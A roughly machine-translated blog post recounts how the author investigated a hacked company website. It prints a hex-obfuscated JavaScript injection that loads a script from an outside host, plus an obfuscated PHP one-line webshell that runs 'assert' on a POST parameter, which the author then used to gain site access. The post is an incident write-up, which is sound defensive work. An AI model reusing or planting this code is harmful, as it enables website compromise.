• Welcome to the eight year blog, I'm glad to meet you at the right age!
  • Due to the theme, QQ login partners will display the default avatar in the comments. Please go to the personal center and upload the avatar again.

Company website is hanged horse, self check loophole method

Website tips barben 2 years ago (April 20, 2019) 661 views 0 comments

Yesterday, the manager came again and said that the company's website was hung up

Since I don't know how to penetrate, I can only feel it blindly

What do you have in the front page file?

The three major labels are as follows:

There is also a section of JS code, copied to Baidu, found that this code is basically in the black site, however, I do not know what things

 <script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22  \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
</script>

For hexadecimal encoding, the result after converting the Unicode code is as follows:
If you look at it carelessly, you may output the return value of this JS file on the page.

At the bottom of the page, I found a bunch of links to PHP files

And then I'll take a look at where these PHP files are

It turns out that these documents are the same, but the names are different. I have a look at this PHP code again. It means to read the contents in the address of reads passed to the user-defined method and output it.

Then I was very decisive to open this address, but because the company's website was hacked for too long, it was found that this address is also very unfortunate 404

Check through the log

If you know where the web page has been linked with a black chain, you have to check how you have been authorized.
First of all, it is impossible to guess the FTP password. FTP passwords of all websites of the company are randomly generated and mixed with upper and lower case numbers.
Then I downloaded all the visit logs of the website, but I couldn't find it because of the blackout time.
Next, I wanted to check the operation log in the background, but I found that the background was written by my company's predecessors, which was not so perfect, let alone the operation log.
Truth without solution

How about safety dog?

Since they do not have the ability to check, then use software to check where the back door is.
Take a look at the website safety dog: http://free.safedog.cn/website_ safedog.html
(@ please pay for the advertising fee of safety dog)

After downloading all the files of the website, a scan found a lot of girls.

Because I used to use a word Trojan horse to play a simple invasion, so I randomly opened the second scan results, but really confirmed the eyes!!!

Next, the Trojan file is opened. There are only two lines of code exposed in the whole file, and the rest are all commented out code (even to disguise as a dream weaving CMS file is also powerful).

Copy these two pieces of code to Baidu, see what this is?

 $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);

It's really a word. Baidu after knowing this sentence, Trojan horse password is 4.

Well, now that you know it's a sentence, let's use some of the trivial things I used to have a try with the legendary Chinese kitchen knife?

Sure enough, I got all the rights of the website

To be continued

There are too many things to say about penetration, or do a good job in the security protection of the website is the most important, for the security loopholes and Trojan files found out, you should delete in time, do not let bad corn have an opportunity to take advantage of it!!!
As for the company's website vulnerabilities emmmmm… . still looking~


Eight blogs that year, we've been there all the time
If the author does not indicate the original article, please indicate the link and source of this article
Company's website is hung up, self check vulnerability method - https://www.barben.cn/skill/435.html
Like it( seven )
Post my comments
Cancel comment
expression Mapping Bold Strikethrough Center Italics

You need to bring your nickname and email with you in the year of eight!

  • Nickname (required)
  • Email address (required)
  • website